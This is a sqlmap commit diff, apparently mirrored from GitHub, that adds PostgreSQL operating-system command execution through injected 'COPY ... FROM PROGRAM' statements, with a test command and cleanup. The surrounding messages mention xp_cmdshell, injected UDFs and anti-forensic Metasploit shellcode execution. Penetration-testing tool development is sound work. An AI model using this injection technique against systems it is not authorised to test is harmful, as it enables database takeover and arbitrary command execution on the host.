Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 2d129f3

Browse files
stamparmstamparm
committed
Finalizing #3545 
1 parent 5ced273 commit 2d129f3

6 files changed

Lines changed: 50 additions & 16 deletions

File tree

lib/core/option.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1882,6 +1882,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
18821882
kb.connErrorChoice = None
18831883
kb.connErrorCounter = 0
18841884
kb.cookieEncodeChoice = None
1885+
kb.copyExecTest = None
18851886
kb.counters = {}
18861887
kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
18871888
kb.data = AttribDict()

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.enums import OS
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.3.3.43"
22+
VERSION = "1.3.3.44"
2323
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2424
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2525
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

lib/takeover/abstraction.py

Lines changed: 20 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,10 @@ def __init__(self):
4444
XP_cmdshell.__init__(self)
4545

4646
def execCmd(self, cmd, silent=False):
47-
if self.webBackdoorUrl and not isStackingAvailable():
47+
if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
48+
self.copyExecCmd(cmd)
49+
50+
elif self.webBackdoorUrl and not isStackingAvailable():
4851
self.webBackdoorRunCmd(cmd)
4952

5053
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
@@ -60,7 +63,10 @@ def execCmd(self, cmd, silent=False):
6063
def evalCmd(self, cmd, first=None, last=None):
6164
retVal = None
6265

63-
if self.webBackdoorUrl and not isStackingAvailable():
66+
if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
67+
retVal = self.copyExecCmd(cmd)
68+
69+
elif self.webBackdoorUrl and not isStackingAvailable():
6470
retVal = self.webBackdoorRunCmd(cmd)
6571

6672
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
@@ -103,14 +109,19 @@ def shell(self):
103109
logger.info(infoMsg)
104110

105111
else:
106-
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
107-
infoMsg = "going to use injected sys_eval and sys_exec "
108-
infoMsg += "user-defined functions for operating system "
112+
if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
113+
infoMsg = "going to use 'COPY ... FROM PROGRAM ...' "
114+
infoMsg += "command execution"
115+
logger.info(infoMsg)
116+
117+
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
118+
infoMsg = "going to use injected user-defined functions "
119+
infoMsg += "'sys_eval' and 'sys_exec' for operating system "
109120
infoMsg += "command execution"
110121
logger.info(infoMsg)
111122

112123
elif Backend.isDbms(DBMS.MSSQL):
113-
infoMsg = "going to use xp_cmdshell extended procedure for "
124+
infoMsg = "going to use extended procedure 'xp_cmdshell' for "
114125
infoMsg += "operating system command execution"
115126
logger.info(infoMsg)
116127

@@ -200,7 +211,9 @@ def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
200211

201212
logger.warn(warnMsg)
202213

203-
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
214+
if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
215+
success = True
216+
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
204217
success = self.udfInjectSys()
205218

206219
if success is not True:

plugins/dbms/postgresql/takeover.py

Lines changed: 24 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,8 @@
1010
from lib.core.common import Backend
1111
from lib.core.common import checkFile
1212
from lib.core.common import decloakToTemp
13+
from lib.core.common import isListLike
14+
from lib.core.common import isStackingAvailable
1315
from lib.core.common import randomStr
1416
from lib.core.data import kb
1517
from lib.core.data import logger
@@ -104,13 +106,28 @@ def uncPathRequest(self):
104106
self.cleanup(onlyFileTbl=True)
105107

106108
def copyExecCmd(self, cmd):
107-
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
108-
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
109-
self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
110-
self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
111-
inject.goStacked(self._forgedCmd)
109+
output = None
112110

113-
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
114-
output = inject.getValue(query, resumeValue=False)
111+
if isStackingAvailable():
112+
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
113+
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
114+
self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
115+
self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
116+
inject.goStacked(self._forgedCmd)
117+
118+
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
119+
output = inject.getValue(query, resumeValue=False)
120+
121+
if isListLike(output):
122+
output = os.linesep.join(output)
123+
124+
self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
125+
inject.goStacked(self._cleanupCmd)
115126

116127
return output
128+
129+
def checkCopyExec(self):
130+
if kb.copyExecTest is None:
131+
kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
132+
133+
return kb.copyExecTest

plugins/generic/misc.py

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -140,6 +140,9 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False):
140140
if not isStackingAvailable() and not conf.direct:
141141
return
142142

143+
if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest:
144+
return
145+
143146
if Backend.isOs(OS.WINDOWS):
144147
libtype = "dynamic-link library"
145148

plugins/generic/takeover.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -169,7 +169,7 @@ def osPwn(self):
169169
msg = "how do you want to execute the Metasploit shellcode "
170170
msg += "on the back-end database underlying operating system?"
171171
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
172-
msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"
172+
msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
173173

174174
while True:
175175
choice = readInput(msg, default='1')

0 commit comments

Comments
 (0)